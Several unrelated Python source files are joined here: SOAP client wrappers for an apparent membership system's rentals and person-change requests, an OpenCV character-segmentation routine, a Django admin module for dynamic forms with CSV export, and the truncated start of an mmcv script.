def OccupationRentReservationUpdate(self, ID_Login, ID, ID_User, ID_Occupation, ID_OccupationRent, ID_Unit, EstimatedStart, EstimatedEnd, RealStart, RealEnd, EstimatedPersonCount, LastUpdate, Created, ID_OccupationRentReservationState=None, OccupationRentReservationState=None, OccupationRent=None, Unit=None, RegistrationNumber=None, ContactPerson=None, ContactPhone=None, ContactMail=None, RejectionReason=None, Note=None):
    """Update a reservation of a borrowable unit; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID": ID, "ID_User": ID_User,
        "ID_Occupation": ID_Occupation, "ID_OccupationRent": ID_OccupationRent,
        "ID_Unit": ID_Unit, "EstimatedStart": EstimatedStart,
        "EstimatedEnd": EstimatedEnd, "RealStart": RealStart, "RealEnd": RealEnd,
        "EstimatedPersonCount": EstimatedPersonCount, "LastUpdate": LastUpdate,
        "Created": Created,
        "ID_OccupationRentReservationState": ID_OccupationRentReservationState,
        "OccupationRentReservationState": OccupationRentReservationState,
        "OccupationRent": OccupationRent, "Unit": Unit,
        "RegistrationNumber": RegistrationNumber, "ContactPerson": ContactPerson,
        "ContactPhone": ContactPhone, "ContactMail": ContactMail,
        "RejectionReason": RejectionReason, "Note": Note,
    }
    return self._client.service.OccupationRentReservationUpdate(payload)
# Confirm a borrowable-unit reservation
def OccupationRentReservationUpdateConfirm(self, ID_Login, ID):
    """Confirm reservation ``ID`` of a borrowable unit."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationRentReservationUpdateConfirm(payload)
# Reject (cancel) a borrowable-unit reservation
def OccupationRentReservationUpdateReject(self, ID_Login, ID, RejectionReason=None):
    """Reject reservation ``ID``, optionally recording ``RejectionReason``."""
    payload = {"ID_Login": ID_Login, "ID": ID, "RejectionReason": RejectionReason}
    return self._client.service.OccupationRentReservationUpdateReject(payload)
# Update a realty occupation
def OccupationUpdateRealty(self, ID, ID_Login, Publish, IsBorrowable, Capacity, BorrowableForeign, IsBookable, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, Note=None, DisplayName=None, Person=None, Email=None, Phone=None, Web=None, Fotogallery=None, ContactNote=None, Requirements=None, CapacityNote=None, AccommodationNote=None, BookUrl=None, Tags=None, Equipment=None, Languages=None):
    """Update a realty occupation; forwards all arguments unchanged."""
    payload = {
        "ID": ID, "ID_Login": ID_Login, "Publish": Publish,
        "IsBorrowable": IsBorrowable, "Capacity": Capacity,
        "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable,
        "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension,
        "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension,
        "Note": Note, "DisplayName": DisplayName, "Person": Person,
        "Email": Email, "Phone": Phone, "Web": Web, "Fotogallery": Fotogallery,
        "ContactNote": ContactNote, "Requirements": Requirements,
        "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote,
        "BookUrl": BookUrl, "Tags": Tags, "Equipment": Equipment,
        "Languages": Languages,
    }
    return self._client.service.OccupationUpdateRealty(payload)
# Create a realty occupation
def OccupationInsertRealty(self, ID_Login, ID_Unit, ID_Realty, ID_RealtyType, Publish, IsBorrowable, Capacity, BorrowableForeign, IsBookable, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, BasePrice, ScoutPrice, ChildPrice, Note=None, DisplayName=None, Person=None, Email=None, Phone=None, Web=None, Fotogallery=None, ContactNote=None, Requirements=None, CapacityNote=None, AccommodationNote=None, Tags=None, Equipment=None, Languages=None, ID_OccupationRentPriceType=None, PriceNote=None):
    """Create a realty occupation.

    Pure pass-through wrapper: all arguments are forwarded unchanged as one
    payload dict to the remote SOAP operation of the same name; returns the
    raw service response.
    """
    return self._client.service.OccupationInsertRealty({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_Realty": ID_Realty, "ID_RealtyType": ID_RealtyType, "Publish": Publish, "IsBorrowable": IsBorrowable, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable, "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension, "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension, "BasePrice": BasePrice, "ScoutPrice": ScoutPrice, "ChildPrice": ChildPrice, "Note": Note, "DisplayName": DisplayName, "Person": Person, "Email": Email, "Phone": Phone, "Web": Web, "Fotogallery": Fotogallery, "ContactNote": ContactNote, "Requirements": Requirements, "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote, "Tags": Tags, "Equipment": Equipment, "Languages": Languages, "ID_OccupationRentPriceType": ID_OccupationRentPriceType, "PriceNote": PriceNote})
# Load the list of languages
def OccupationLanguageAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
    """Load the list of occupation languages."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID": ID, "DisplayName": DisplayName,
    }
    return self._client.service.OccupationLanguageAll(payload)
# Load the list of borrowable units
def OccupationRentAll(self, ID_Login, ID_Application, ID_Occupation, ID, DisplayName=None):
    """Load the borrowable units of occupation ``ID_Occupation``."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID_Occupation": ID_Occupation, "ID": ID, "DisplayName": DisplayName,
    }
    return self._client.service.OccupationRentAll(payload)
# Load the detail of a borrowable unit
def OccupationRentDetail(self, ID_Login, ID):
    """Load the detail of borrowable unit ``ID``."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationRentDetail(payload)
# Load the equipment list of a borrowable unit
def OccupationRentEquipmentAll(self, ID_Login, ID_Application, ID_Occupation, ID, ID_OccupationEquipment):
    """Load the equipment assigned to a borrowable unit."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID_Occupation": ID_Occupation, "ID": ID,
        "ID_OccupationEquipment": ID_OccupationEquipment,
    }
    return self._client.service.OccupationRentEquipmentAll(payload)
# Create a borrowable unit
def OccupationRentInsert(self, ID_Login, ID, ID_Occupation, IsActive, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, Capacity, BorrowableForeign, IsBookable, LastUpdate, ID_DocumentRequirement, ID_DocumentPhoto, DisplayName=None, Email=None, Phone=None, Web=None, PhotoExtension=None, Fotogallery=None, ContactNote=None, RequirementExtension=None, Requirements=None, CapacityNote=None, AccommodationNote=None, Person=None, Equipment=None, Tags=None, Languages=None):
    """Create a borrowable unit.

    Pure pass-through wrapper: all arguments are forwarded unchanged as one
    payload dict to the remote SOAP operation of the same name; returns the
    raw service response.
    """
    return self._client.service.OccupationRentInsert({"ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation, "IsActive": IsActive, "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension, "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable, "LastUpdate": LastUpdate, "ID_DocumentRequirement": ID_DocumentRequirement, "ID_DocumentPhoto": ID_DocumentPhoto, "DisplayName": DisplayName, "Email": Email, "Phone": Phone, "Web": Web, "PhotoExtension": PhotoExtension, "Fotogallery": Fotogallery, "ContactNote": ContactNote, "RequirementExtension": RequirementExtension, "Requirements": Requirements, "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote, "Person": Person, "Equipment": Equipment, "Tags": Tags, "Languages": Languages})
# Load the languages of a borrowable unit
def OccupationRentLanguageAll(self, ID_Login, ID_Application, ID_Occupation, ID, ID_OccupationLanguage=None):
    """Load the languages assigned to a borrowable unit."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID_Occupation": ID_Occupation, "ID": ID,
        "ID_OccupationLanguage": ID_OccupationLanguage,
    }
    return self._client.service.OccupationRentLanguageAll(payload)
# Load the list of rental prices
def OccupationRentPriceAll(self, ID_Login, ID_Occupation, ID, ID_OccupationRentPriceType=None):
    """Load rental prices, optionally filtered by price type."""
    payload = {
        "ID_Login": ID_Login, "ID_Occupation": ID_Occupation, "ID": ID,
        "ID_OccupationRentPriceType": ID_OccupationRentPriceType,
    }
    return self._client.service.OccupationRentPriceAll(payload)
# Delete a rental price
def OccupationRentPriceDelete(self, ID_Login, ID):
    """Delete rental price ``ID``."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationRentPriceDelete(payload)
# Load the detail of a rental price
def OccupationRentPriceDetail(self, ID_Login, ID):
    """Load the detail of rental price ``ID``."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationRentPriceDetail(payload)
# Create a rental price
def OccupationRentPriceInsert(self, ID_Login, ID, ID_Occupation, ID_OccupationRent, BasePrice, ScoutPrice, ChildPrice, OccupationRent=None, ID_OccupationRentPriceType=None, OccupationRentPriceType=None, PriceNote=None):
    """Create a rental price record; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation,
        "ID_OccupationRent": ID_OccupationRent, "BasePrice": BasePrice,
        "ScoutPrice": ScoutPrice, "ChildPrice": ChildPrice,
        "OccupationRent": OccupationRent,
        "ID_OccupationRentPriceType": ID_OccupationRentPriceType,
        "OccupationRentPriceType": OccupationRentPriceType,
        "PriceNote": PriceNote,
    }
    return self._client.service.OccupationRentPriceInsert(payload)
# Load the list of price types
def OccupationRentPriceTypeAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
    """Load the list of rental price types."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID": ID, "DisplayName": DisplayName,
    }
    return self._client.service.OccupationRentPriceTypeAll(payload)
# Update a rental price
def OccupationRentPriceUpdate(self, ID_Login, ID, ID_Occupation, ID_OccupationRent, BasePrice, ScoutPrice, ChildPrice, OccupationRent=None, ID_OccupationRentPriceType=None, OccupationRentPriceType=None, PriceNote=None):
    """Update a rental price record; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation,
        "ID_OccupationRent": ID_OccupationRent, "BasePrice": BasePrice,
        "ScoutPrice": ScoutPrice, "ChildPrice": ChildPrice,
        "OccupationRent": OccupationRent,
        "ID_OccupationRentPriceType": ID_OccupationRentPriceType,
        "OccupationRentPriceType": OccupationRentPriceType,
        "PriceNote": PriceNote,
    }
    return self._client.service.OccupationRentPriceUpdate(payload)
# Load the tags of a rentable unit
def OccupationRentTagAll(self, ID_Login, ID_Occupation, ID, ID_OccupationTag):
    """Load the tags assigned to a rentable unit."""
    payload = {
        "ID_Login": ID_Login, "ID_Occupation": ID_Occupation,
        "ID": ID, "ID_OccupationTag": ID_OccupationTag,
    }
    return self._client.service.OccupationRentTagAll(payload)
# Update a borrowable unit
def OccupationRentUpdate(self, ID_Login, ID, ID_Occupation, IsActive, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, Capacity, BorrowableForeign, IsBookable, LastUpdate, ID_DocumentRequirement, ID_DocumentPhoto, DisplayName=None, Email=None, Phone=None, Web=None, PhotoExtension=None, Fotogallery=None, ContactNote=None, RequirementExtension=None, Requirements=None, CapacityNote=None, AccommodationNote=None, Person=None, Equipment=None, Tags=None, Languages=None):
    """Update a borrowable unit.

    Pure pass-through wrapper: all arguments are forwarded unchanged as one
    payload dict to the remote SOAP operation of the same name; returns the
    raw service response.
    """
    return self._client.service.OccupationRentUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation, "IsActive": IsActive, "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension, "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable, "LastUpdate": LastUpdate, "ID_DocumentRequirement": ID_DocumentRequirement, "ID_DocumentPhoto": ID_DocumentPhoto, "DisplayName": DisplayName, "Email": Email, "Phone": Phone, "Web": Web, "PhotoExtension": PhotoExtension, "Fotogallery": Fotogallery, "ContactNote": ContactNote, "RequirementExtension": RequirementExtension, "Requirements": Requirements, "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote, "Person": Person, "Equipment": Equipment, "Tags": Tags, "Languages": Languages})
# Load the list of tags
def OccupationTagAll(self, ID_Login, ID, DisplayName=None):
    """Load the list of occupation tags."""
    payload = {"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName}
    return self._client.service.OccupationTagAll(payload)
# Load the list of legal-guardian types
def ParentTypeAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
    """Load the list of legal-guardian (parent) types."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID": ID, "DisplayName": DisplayName,
    }
    return self._client.service.ParentTypeAll(payload)
# Load the persons of an educational event
def PersonAllEventEducationApi(self, ID_Login, ID_Application, ID_EventEducation):
    """Load the persons attached to educational event ``ID_EventEducation``."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID_EventEducation": ID_EventEducation,
    }
    return self._client.service.PersonAllEventEducationApi(payload)
# Global person search
def PersonAllGlobalSearch(self, ID_Login, ID_Application, UseParentCode, IdentificationCode=None, FirstName=None, LastName=None, Name=None):
    """Search persons globally; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "UseParentCode": UseParentCode, "IdentificationCode": IdentificationCode,
        "FirstName": FirstName, "LastName": LastName, "Name": Name,
    }
    return self._client.service.PersonAllGlobalSearch(payload)
# Load persons by name (external lookup)
def PersonAllExternal(self, ID_Login, ID_Application, ID, ID_User, Top, DisplayName=None):
    """Load up to ``Top`` persons matched by name; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID": ID, "ID_User": ID_User, "Top": Top, "DisplayName": DisplayName,
    }
    return self._client.service.PersonAllExternal(payload)
# Load persons for Google group synchronization
def PersonAllGoogleGroupSync(self, ID_Login, ID_GoogleGroup):
    """Load the persons to synchronize into Google group ``ID_GoogleGroup``."""
    payload = {"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup}
    return self._client.service.PersonAllGoogleGroupSync(payload)
# Load persons of a member-card print batch
def PersonAllMemberCardPrint(self, ID_Login, ID_MemberCardPrint):
    """Load the persons belonging to print batch ``ID_MemberCardPrint``."""
    payload = {"ID_Login": ID_Login, "ID_MemberCardPrint": ID_MemberCardPrint}
    return self._client.service.PersonAllMemberCardPrint(payload)
# Load the person-change records of a change request
def PersonChangeAllPersonChangeRequest(self, ID_Login, ID_PersonChangeRequest):
    """Load person changes attached to request ``ID_PersonChangeRequest``."""
    payload = {"ID_Login": ID_Login, "ID_PersonChangeRequest": ID_PersonChangeRequest}
    return self._client.service.PersonChangeAllPersonChangeRequest(payload)
# Load the new-data detail of a person change
def PersonChangeDetailChanges(self, ID_Login, ID_Application, AccessKey, ID):
    """Load the new (changed) data of person change ``ID``."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "AccessKey": AccessKey, "ID": ID,
    }
    return self._client.service.PersonChangeDetailChanges(payload)
# Load the detail of a person change
def PersonChangeDetail(self, ID_Login, ID_Application, AccessKey, ID):
    """Load the detail of person change ``ID``."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "AccessKey": AccessKey, "ID": ID,
    }
    return self._client.service.PersonChangeDetail(payload)
# Create a person change from a change-request person
def PersonChangeInsertPersonChangeRequestPerson(self, ID_Login, ID_PersonChangeRequestPerson, SendMessage):
    """Create a person change based on a change-request person record."""
    payload = {
        "ID_Login": ID_Login,
        "ID_PersonChangeRequestPerson": ID_PersonChangeRequestPerson,
        "SendMessage": SendMessage,
    }
    return self._client.service.PersonChangeInsertPersonChangeRequestPerson(payload)
# Verify the code for changing a person's data
def PersonChangeOtherVerify(self, ID_Login, ID_Application, AccessKey, BirthDate, IsForeign, LastName=None, IdentificationCodeEnd=None, BirthCity=None):
    """Verify the access code for a person-data change; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "AccessKey": AccessKey, "BirthDate": BirthDate, "IsForeign": IsForeign,
        "LastName": LastName, "IdentificationCodeEnd": IdentificationCodeEnd,
        "BirthCity": BirthCity,
    }
    return self._client.service.PersonChangeOtherVerify(payload)
    # Load the detail of a person change request.
    def PersonChangeRequestDetail(self, ID_Login, ID):
        return self._client.service.PersonChangeRequestDetail({"ID_Login": ID_Login, "ID": ID})
    # Create a person change request.
    def PersonChangeRequestInsert(self, ID_Login, ID, ID_Unit, Created, Sent, Text=None, Persons=None):
        return self._client.service.PersonChangeRequestInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Created": Created, "Sent": Sent, "Text": Text, "Persons": Persons})
    # Submit (update) a person change request.
    def PersonChangeRequestUpdate(self, ID_Login, ID, ID_Unit, Created, Sent, Text=None, Persons=None):
        return self._client.service.PersonChangeRequestUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Created": Created, "Sent": Sent, "Text": Text, "Persons": Persons})
    # Finish (finalize) changes for a person.
    def PersonChangeUpdateFinish(self, ID_Login, ID):
        return self._client.service.PersonChangeUpdateFinish({"ID_Login": ID_Login, "ID": ID})
    # Change the state of a person change.
    def PersonChangeUpdateState(self, ID_Login, ID, ID_PersonChangeState=None):
        return self._client.service.PersonChangeUpdateState({"ID_Login": ID_Login, "ID": ID, "ID_PersonChangeState": ID_PersonChangeState})
    # Update a person change (full set of personal, address, parent and health fields).
    def PersonChangeUpdate(self, ID_Login, ID_Application, AccessKey, OnlyValidate, Birthday, IsForeign, ID_DistrictBirth, ID_PersonParentPerson, ID_PersonParent, DeleteParent, ID_PersonParentPerson2, ID_PersonParent2, DeleteParent2, ID_Assurance, CheckCorrect, IsPostalSame, FirstName=None, LastName=None, ID_Sex=None, IdentificationCode=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Phone=None, Email=None, Note=None, MaidenName=None, ID_Citizenship=None, CitizenshipCustom=None, BirthCity=None, ID_ParentType=None, ParentTypeCustom=None, FirstNameParent=None, LastNameParent=None, EmailParent=None, PhoneParent=None, NoteParent=None, ParentNote=None, ID_ParentType2=None, ParentTypeCustom2=None, FirstNameParent2=None, LastNameParent2=None, EmailParent2=None, PhoneParent2=None, NoteParent2=None, Parent2Note=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None):
        return self._client.service.PersonChangeUpdate({"ID_Login": ID_Login, "ID_Application": ID_Application, "AccessKey": AccessKey, "OnlyValidate": OnlyValidate, "Birthday": Birthday, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "ID_PersonParentPerson": ID_PersonParentPerson, "ID_PersonParent": ID_PersonParent, "DeleteParent": DeleteParent, "ID_PersonParentPerson2": ID_PersonParentPerson2, "ID_PersonParent2": ID_PersonParent2, "DeleteParent2": DeleteParent2, "ID_Assurance": ID_Assurance, "CheckCorrect": CheckCorrect, "IsPostalSame": IsPostalSame, "FirstName": FirstName, "LastName": LastName, "ID_Sex": ID_Sex, "IdentificationCode": IdentificationCode, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Phone": Phone, "Email": Email, "Note": Note, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "ID_ParentType": ID_ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "EmailParent": EmailParent, "PhoneParent": PhoneParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ID_ParentType2": ID_ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "EmailParent2": EmailParent2, "PhoneParent2": PhoneParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School})
    # Load the list of contacts of a person's parents.
    def PersonContactAllParent(self, ID_Login, ID_Person):
        return self._client.service.PersonContactAllParent({"ID_Login": ID_Login, "ID_Person": ID_Person})
    # Load the detail of a contact change request.
    def PersonContactRequestDetail(self, ID_Login, ID):
        return self._client.service.PersonContactRequestDetail({"ID_Login": ID_Login, "ID": ID})
    # Load the detail of a contact change request by its code.
    def PersonContactRequestDetailCode(self, ID_Login, Code):
        return self._client.service.PersonContactRequestDetailCode({"ID_Login": ID_Login, "Code": Code})
    # Update a contact change request.
    def PersonContactRequestUpdate(self, ID_Login, ID, ID_PersonContact, ValidTo, Created, ID_User, Completed, Code, ID_Person, IsCatalog, IsGa, ID_ContactRequestType=None, ContactRequestType=None, Person=None, ID_ContactType=None, ContactType=None, Value=None, Note=None):
        return self._client.service.PersonContactRequestUpdate({"ID_Login": ID_Login, "ID": ID, "ID_PersonContact": ID_PersonContact, "ValidTo": ValidTo, "Created": Created, "ID_User": ID_User, "Completed": Completed, "Code": Code, "ID_Person": ID_Person, "IsCatalog": IsCatalog, "IsGa": IsGa, "ID_ContactRequestType": ID_ContactRequestType, "ContactRequestType": ContactRequestType, "Person": Person, "ID_ContactType": ID_ContactType, "ContactType": ContactType, "Value": Value, "Note": Note})
    # Set the visibility of a contact.
    def PersonContactUpdateHide(self, ID_Login, ID, IsHidden):
        return self._client.service.PersonContactUpdateHide({"ID_Login": ID_Login, "ID": ID, "IsHidden": IsHidden})
    # Load information about the data for a change.
    def PersonDetailPersonChange(self, ID_Login, ID_Application, Code):
        return self._client.service.PersonDetailPersonChange({"ID_Login": ID_Login, "ID_Application": ID_Application, "Code": Code})
    # Check whether a person is entitled to a free journal.
    def PersonDetailCanHaveFreeJournal(self, ID_Login, ID):
        return self._client.service.PersonDetailCanHaveFreeJournal({"ID_Login": ID_Login, "ID": ID})
    # Load information for the dashboard.
    def PersonDetailDashboard(self, ID_Login):
        return self._client.service.PersonDetailDashboard({"ID_Login": ID_Login})
    # Load the count of received and unread messages of a person.
    def PersonDetailMessageCount(self, ID_Login):
        return self._client.service.PersonDetailMessageCount({"ID_Login": ID_Login})
    # Check whether a person is a member of the organisation.
    def PersonDetailMembership(self, ID_Login, ID_Application, IdentificationCode=None):
        return self._client.service.PersonDetailMembership({"ID_Login": ID_Login, "ID_Application": ID_Application, "IdentificationCode": IdentificationCode})
    # Load the list of legal guardians of a person.
    def PersonParentAll(self, ID_Login, ID_Application, ID_Person, ID, ID_PersonParent, ID_ParentType=None):
        return self._client.service.PersonParentAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Person": ID_Person, "ID": ID, "ID_PersonParent": ID_PersonParent, "ID_ParentType": ID_ParentType})
    # Delete a legal guardian of a person.
    def PersonParentDelete(self, ID_Login, ID):
        return self._client.service.PersonParentDelete({"ID_Login": ID_Login, "ID": ID})
    # Load the detail of a legal guardian of a person.
    def PersonParentDetail(self, ID_Login, ID):
        return self._client.service.PersonParentDetail({"ID_Login": ID_Login, "ID": ID})
    # Create a legal guardian of a person.
    def PersonParentInsert(self, ID_Login, ID, ID_Person, ID_PersonParent, ParentHasAccount, Person=None, Parent=None, ID_ParentType=None, ParentType=None, FirstName=None, LastName=None, Phone=None, Email=None, Note=None, ParentNote=None, ParentCode=None):
        return self._client.service.PersonParentInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_PersonParent": ID_PersonParent, "ParentHasAccount": ParentHasAccount, "Person": Person, "Parent": Parent, "ID_ParentType": ID_ParentType, "ParentType": ParentType, "FirstName": FirstName, "LastName": LastName, "Phone": Phone, "Email": Email, "Note": Note, "ParentNote": ParentNote, "ParentCode": ParentCode})
    # Update a legal guardian of a person.
    def PersonParentUpdate(self, ID_Login, ID, ID_Person, ID_PersonParent, ParentHasAccount, Person=None, Parent=None, ID_ParentType=None, ParentType=None, FirstName=None, LastName=None, Phone=None, Email=None, Note=None, ParentNote=None, ParentCode=None):
        return self._client.service.PersonParentUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_PersonParent": ID_PersonParent, "ParentHasAccount": ParentHasAccount, "Person": Person, "Parent": Parent, "ID_ParentType": ID_ParentType, "ParentType": ParentType, "FirstName": FirstName, "LastName": LastName, "Phone": Phone, "Email": Email, "Note": Note, "ParentNote": ParentNote, "ParentCode": ParentCode})
|
import numpy as np
import cv2
import FeatureExtract
def seglist():
    """Segment character-sized regions from a fixed test image and return
    one GLCM feature vector per region.

    Reads 'Pictures\\test1row.png', thresholds it, keeps contours whose
    area and height match characters, preprocesses each crop and runs
    FeatureExtract.getGLCMFeatures on it.

    Returns:
        list: feature vectors, one per accepted contour.
    """
    roiList = []
    feature = []
    img = cv2.imread('Pictures\\test1row.png')
    # Gray conversion of the image.
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Image thresholding.
    ret, thresh = cv2.threshold(gray, 230, 255, cv2.THRESH_BINARY)
    # findContours returns 3 values on OpenCV 3.x but only 2 on OpenCV 4.x,
    # where index [1] would be the hierarchy, not the contours.  [-2] picks
    # the contour list on both versions.
    contours = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[-2]
    for cnt in contours:
        # Restricting the contour area (computed once per contour).
        area = cv2.contourArea(cnt)
        if 20 < area < 700:
            [x, y, w, h] = cv2.boundingRect(cnt)
            # Restricting the height of the contour.
            if h > 28:
                cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 1)
                roismall = gray[y:y + h, x:x + w]
                roismall = np.float32(roismall)
                resized_roismall = FeatureExtract.preprocess(roismall)
                roiList.append(resized_roismall)
    print("Extracting features for Contours")
    for i in roiList:
        feature.append(FeatureExtract.getGLCMFeatures(i))
    return feature
from bpyutils.util import _dict |
from datetime import date
from django import forms
from django.http import HttpResponse
from django.contrib import admin
from models import DynamicFieldValue, DynamicField, DynamicFormFieldRelation, DynamicForm, DynamicFormData
from StringIO import StringIO
from zipfile import ZipFile
import csv
class DynamicFieldValue_Inline(admin.TabularInline):
    # Inline editor for a field's predefined values; no spare blank rows.
    model = DynamicFieldValue
    extra = 0
class DynamicFieldAdminForm(forms.ModelForm):
    """Admin form that restricts the 'default' choices to the field's own values."""
    class Meta:
        model = DynamicField

    def __init__(self, *args, **kwargs):
        super(DynamicFieldAdminForm, self).__init__(*args, **kwargs)
        # ModelForm always supplies an instance object (possibly unsaved), so
        # truthiness of self.instance is not a reliable add-vs-change check.
        # Use the primary key: only a saved field can have related values.
        if self.instance is not None and self.instance.pk:
            self.fields['default'].queryset = self.instance.values.all()
        else:
            self.fields['default'].queryset = DynamicFieldValue.objects.none()
class DynamicFieldAdmin(admin.ModelAdmin):
    # Field admin: inline value editing plus list-level editing of options,
    # filterable by the form the field belongs to.
    model = DynamicField
    inlines = [DynamicFieldValue_Inline]
    form = DynamicFieldAdminForm
    list_display = ['label', 'type', 'required', 'default', 'help_text']
    list_editable = ['type', 'required', 'help_text']
    list_filter = ['dynamicform__name']
class DynamicFormFieldRelation_Inline(admin.TabularInline):
    # Inline linking fields to a form; no spare blank rows.
    model = DynamicFormFieldRelation
    extra = 0
class DynamicFormAdmin(admin.ModelAdmin):
    """Admin for DynamicForm with a CSV / zip-of-CSVs export action."""
    model = DynamicForm
    fieldsets = (
        (None, {'fields': ['name', 'slug', 'type', 'success_url', 'notification_emails']}),
        ('Confirmation e-mail', {'classes': ['collapse'], 'fields': ['send_confirmation', 'email_recipients', 'email_subject', 'email_content']}),
    )
    inlines = [DynamicFormFieldRelation_Inline]
    prepopulated_fields = {'slug': ['name']}
    list_display = ['name', 'slug', 'type', 'success_url']
    list_editable = ['type', 'success_url']
    actions = ['export_data_as_csv']

    def export_form_data_as_csv(self, dynamicform, output):
        """Write one form's submitted data to ``output`` as CSV."""
        writer = csv.DictWriter(output, fieldnames=dynamicform.field_names)
        # Header row with the field names.
        writer.writerow(dict((f, f) for f in dynamicform.field_names))
        for row in dynamicform.data_as_dicts():
            writer.writerow(row)

    def export_data_as_csv(self, request, queryset):
        """Admin action: one form -> a CSV file; several -> a zip of CSVs."""
        output = StringIO()
        if queryset.count() == 1:
            # Fetch the single form once instead of calling queryset.get()
            # twice (the original issued two identical database queries).
            dynamicform = queryset.get()
            self.export_form_data_as_csv(dynamicform, output)
            mimetype = 'text/csv'
            filename = '%s.%s.csv' % (dynamicform.name, date.today())
        else:
            zipfile = ZipFile(output, 'w')
            for dynamicform in queryset:
                csv_output = StringIO()
                self.export_form_data_as_csv(dynamicform, csv_output)
                filename = '%s.%s.csv' % (dynamicform.name, date.today())
                zipfile.writestr(filename, csv_output.getvalue())
            zipfile.close()
            mimetype = 'application/zip'
            filename = 'dynamicforms-data.%s.zip' % date.today()
        response = HttpResponse(output.getvalue(), mimetype=mimetype)
        response['Content-Disposition'] = 'attachment; filename=%s' % filename
        return response
    # Human-readable label in the admin actions dropdown (otherwise the raw
    # function name is shown).
    export_data_as_csv.short_description = 'Export submitted data as CSV'
class DynamicFormDataAdmin(admin.ModelAdmin):
    # Browsing admin for submitted form data, filterable by form name.
    model = DynamicFormData
    list_display = ['dynamicform', 'timestamp']
    list_filter = ['dynamicform__name']
# Register the dynamic-forms models with the default admin site.
admin.site.register(DynamicField, DynamicFieldAdmin)
admin.site.register(DynamicForm, DynamicFormAdmin)
admin.site.register(DynamicFormData, DynamicFormDataAdmin)
|
import os
import os.path as osp
import numpy as np
from glob import glob
from tqdm import tqdm
import mmcv
def disp_modulate(disp_map, max_value=1):
